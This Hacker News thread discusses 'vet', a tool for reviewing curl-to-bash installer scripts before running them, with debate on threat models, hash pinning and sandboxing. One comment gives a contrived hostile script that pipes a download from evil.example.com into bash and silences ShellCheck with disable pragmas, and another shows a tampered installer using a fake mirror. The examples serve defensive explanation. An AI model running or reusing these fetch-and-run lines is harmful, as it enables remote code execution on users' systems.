My main question is: in 90% of cases these are installers. How are you actually verifying the software that you install? In some cases it is signed and verified, but in many cases it is just coming down from the same HTTPS server with no additional verification. So are you then diffing the code (which may be compiled) as well?
I'm not saying that running random installers from the internet is a great pattern. Something like installing from your distribution can have better verification mechanisms. But this seems to add very little confidence.
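For the signed-and-verified case, the usual out-of-band check looks roughly like this; a minimal sketch, assuming the project publishes a checksum file plus a detached signature (the URLs and file names are illustrative, not from any particular project):

```sh
# Illustrative only: the release URLs and file names are made up.
curl -fsSLO https://example.com/releases/tool-1.0.tar.gz
curl -fsSLO https://example.com/releases/SHA256SUMS
curl -fsSLO https://example.com/releases/SHA256SUMS.asc

# Verify the checksum file against a maintainer key you already trust,
# then verify the artifact against the signed checksums.
gpg --verify SHA256SUMS.asc SHA256SUMS
sha256sum -c SHA256SUMS --ignore-missing
```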
a10r · 4h ago
You're absolutely right—vet's scope is focused on securing the installer script itself, not the binary it downloads.
The goal is to prevent the installer from being maliciously modified to, for example, skip its own checksum verification or download a binary from a different, malicious URL.
It's one strong link in the chain, but you're right that it's not the whole chain.
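As a made-up illustration (not a real installer), the kind of tampering a pre-run diff is meant to catch:

```sh
# Before (hypothetical original installer):
BINARY_URL="https://releases.example.com/tool-v1.4.2-linux-amd64"
curl -fsSL "$BINARY_URL" -o /usr/local/bin/tool
echo "$EXPECTED_SHA256  /usr/local/bin/tool" | sha256sum -c -

# After tampering: different host, and the checksum line is silently gone.
BINARY_URL="https://cdn.not-a-real-mirror.example/tool-latest"
curl -fsSL "$BINARY_URL" -o /usr/local/bin/tool
```

The downloaded binary still isn't verified by vet itself, as you point out, but both of those edits would show up in the diff before anything runs.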
thealistra · 3h ago
Can you show how it works as a video on the page or in the readme?
Does it open a pager or an editor? How does it show the shellcheck issues?
gardnr · 4h ago
This is a great idea!
One extra feature could be passing the contents of the shell script to an LLM and asking it to surface any security concerns.
alganet · 3h ago
What if someone peppers their malicious script with `# shellcheck disable=` pragmas?
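The directive syntax is real, so this is a fair concern; a contrived example (the URL is made up), assuming the attacker controls the script:

```sh
#!/bin/bash
# ShellCheck directives placed before the first command apply to the
# whole file, so a hostile script can pre-silence its own findings:
# shellcheck disable=SC2086

PAYLOAD_URL=https://evil.example.com/payload.sh   # made-up URL
curl -fsSL $PAYLOAD_URL | bash    # unquoted expansion, warning suppressed
rm -rf $PREFIX/old                # likewise suppressed
```

The pragmas only mute lint findings, though; the offending lines are still there to be seen when you review the script before confirming.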
3abiton · 3h ago
This is an amazing solution. I've wondered about this often (looking at you, `uv`), but in a lot of cases I cave, given that everyone else trusts the code maintainers.
a10r · 4h ago
Love the idea!
The two biggest hurdles for a security tool like this are LLM non-determinism and the major privacy risk of sending code to a third-party API.
This is exactly why vet relies on ShellCheck—it's deterministic, rules-based, and runs completely offline. It will always give the same, trustworthy output for the same input.
But your vision of smarter analysis is absolutely the right direction to be thinking. I'm excited for a future where fast, local AI models can make that a reality for vet. Great food for thought!
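For what it's worth, once local models are good enough, the shape of it could be as simple as piping the fetched script to one; a hypothetical sketch, assuming an Ollama-style local CLI and model, neither of which is part of vet today:

```sh
# Hypothetical: assumes a locally hosted model served via the ollama CLI.
prompt="Review this shell script for security concerns (unexpected downloads,
privilege escalation, obfuscation) and list anything suspicious:"
ollama run llama3 "$prompt
$(cat /tmp/install.sh)"
```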
a10r · 5h ago
Hi HN, I'm the creator of `vet`. I've always been a bit nervous about the `curl | bash` pattern, even for trusted projects. It feels like there's a missing safety step. I wanted a tool that would show me a diff if a script changed, run it through `shellcheck`, and ask for my explicit OK before executing. That's why I built `vet`.
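For anyone who hasn't seen the pattern, the flow is roughly this; a simplified sketch, not vet's actual implementation (the URL and cache path are placeholders):

```sh
# Simplified sketch of the idea, not vet's real code.
url="https://example.com/install.sh"
mkdir -p "$HOME/.cache/vet"
cache="$HOME/.cache/vet/$(echo -n "$url" | sha256sum | cut -d' ' -f1)"

curl -fsSL "$url" -o /tmp/install.sh

# 1. Show what changed since the last approved version of this URL.
[ -f "$cache" ] && diff -u "$cache" /tmp/install.sh

# 2. Lint it.
shellcheck /tmp/install.sh

# 3. Ask before anything executes.
read -rp "Run this script? [y/N] " answer
if [ "$answer" = "y" ]; then
    cp /tmp/install.sh "$cache"
    bash /tmp/install.sh
fi
```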
The install process itself uses this philosophy - I encourage you to check the installer script before running it!
I'd love to hear your feedback.
The repo is at https://github.com/vet-run/vet
I'm glad to see that I'm not the only person worried about this. It's a pretty glaring bit of attack surface if you ask me. I chuckled when I saw you used nvm as an example in your readme. I've pestered nvm about this sort of thing in the past (https://github.com/nvm-sh/nvm/issues/3349).
I'm a little uncertain about your threat model though. If you've got an SSL-tampering adversary that can serve you a malicious script when you expected the original, don't you think they'd also be sophisticated enough to instead cause the authentic script to subsequently download a malicious payload?
I know that nobody wants to deal with the headaches associated with keeping track of cryptographic hashes for everything you receive over a network (nix is, among other things, a tool for doing this). But I'm afraid it's the only way to actually solve this problem:
1. get remote inputs, check against hashes that were committed to source control
2. make a sandbox that doesn't have internet access
3. do the compute in that sandbox (to ensure it doesn't phone home for a payload which you haven't verified the hash of)
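Concretely, those three steps can be approximated with plain coreutils and util-linux on Linux (unprivileged user namespaces required); a rough sketch, with the URL and pinned hash as placeholders:

```sh
# Placeholder hash; in practice it lives in source control next to your code.
pinned="<sha256 committed to your repo>  install.sh"

curl -fsSL https://example.com/install.sh -o install.sh

# 1. Check the download against the pinned hash.
echo "$pinned" | sha256sum -c - || exit 1

# 2 + 3. Run it in a namespace with no network access, so it can't
# fetch a payload whose hash was never verified.
unshare --map-root-user --net bash install.sh
```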